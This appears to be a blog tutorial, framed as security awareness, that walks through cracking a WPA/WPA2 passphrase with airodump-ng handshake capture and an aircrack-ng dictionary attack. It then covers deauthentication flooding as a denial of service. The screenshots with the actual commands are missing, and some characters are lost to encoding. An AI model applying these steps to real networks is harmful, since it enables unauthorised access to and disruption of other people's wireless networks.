Let's crack the WiFi Password, Dude!

[This post is to raise awareness about hacking and cybersecurity. Don't use the default password. Always change it immediately and use the proper combination of alphabetic letters, numbers, and symbols]

Lets Crack WPA/WPA 2

WPA is the updated version of its predecessor, WEP.?It's one of the security protocols released in 2003. This protocol uses the TKIP (Temporal Key Integrity Protocol) encryption algorithm, improving the WEP version without installing any hardware. Still, you can crack the password, but for that, you need a dictionary attack. The inputs required for this attack are the four-way WPA handshake between the client and access point and a wordlist that contains common passphrases. Then, using tools such as aircrack-ng, we can try to crack the WPA/ WPA2 PSK passphrase. So, first, we need a dongle to crack WPA/WPA 2, and then we will follow the below steps.

Step 1:?

We first need to start our wireless network in monitor mode.

?After typing iwconfig we can check the status (On my computer, the device is called wlan0. On your computer the device can be different)

?In order to verify the status, run iwconfig. We notice that I now have wlan0mon instead of wlan0. This will start our wireless network in monitor mode. Now, we launch airodump-ng with the aforementioned command to have it begin collecting and archiving all network packets.

Therefore, once the data and all the WiFi information are gathered, you might start seeing control messages from nearby wireless networks on your screen. You just need to do this to determine which access point you wish to target.

?

?Here,

·?bssid is the MAC address of the wireless access point.

·channel 11 is the channel the access point is running on WPACrackingDemo is the file name I have used to save the captured packets.

We now have two options: either we issue a broadcast de-authentication packet to compel clients to reconnect or wait for a fresh client to connect to the access point so that we may record the four-way WPA handshake. To hasten the process, we do the latter. With the unknown channel error, the identical scenario can take place once again.

Again, use --ignorenegative- one. This can also require more than one attempt.?As soon as we capture a WPA handshake, the airodump-ng tool will indicate it in the top-right corner of the screen with a WPA handshake followed by the access point's BSSID.

If you are using --ignore-negative-one, the tool may replace the WPA handshake with a fixed channel message. Just keep an eye out for a quick flash of a WPA handshake. If we check our working directory, we should see that a .cap file has been generated.

We can stop the airodump-ng utility now. Let's open up the capture file in Wireshark and view the four-way handshake. The handshake packets are the ones whose protocol is EAPOL. You can filter this by typing EAPOL into the filter bar.

The real key-cracking activity will now begin. The common word dictionary you obtained in the previous step is required for this.

We will now invoke the aircrack-ng utility with the pcap file as the input and a link to the dictionary _le, as shown in the following screenshot. I have used passwords. 1st, which I have installed on Desktop, as shown in the terminal.

?The aircrack-ng utility uses the dictionary file to try various combinations of passphrases and tries to crack the key. If the passphrase is present in the dictionary file, it will eventually crack it.

Please note that, as this is a dictionary attack, the prerequisite is that the passphrase must be present in the dictionary file you are supplying to aircrack-ng. The attack will fail if the passphrase is not present in the dictionary!

Hurray! Here is the password :

DOS: Deauthentication attacks

Let's connect a Windows client to the access point. We will see the connection in the airodump-ng screen. Now, on the attacker machine, let's run a directed de-authentication attack against this.

?Note how the client gets disconnected from the access point completely. We can verify this on the airodump-ng screen as well.

we use Wireshark to see the traffic, you will notice a lot of de=authentication packets that we just sent over the air.

We can make the same attack by sending a Broadcast de-authentication packet on behalf of the access point to the entire wireless network. This will have the effect of disconnecting all connected clients.

?We successfully sent de-authentication frames to both the access point and the client. This resulted in them getting disconnected and a full loss of communication between them.

We also sent out Broadcast de-authentication packets, ensuring that no client in the vicinity could successfully connect to our access point.?It is important to note that, as soon as the client is disconnected, it will try to connect back again to the access point, and thus the de-authentication attack must be carried out in a sustainable way to have a full DoS effect.

?This is one of the easiest attacks to orchestrate but has the most devastating effect. This can easily be used in the real world to bring a wireless network down on its knees.

?And here we are :

Reference:

1.????Dr. Ayman El Hajjar, Professor (Northumbria University )

2.????Dr. Abdul Salih, Professor (Northumbria University)

3.????Wireless security. ?Wolfgang Osterhage?(Book)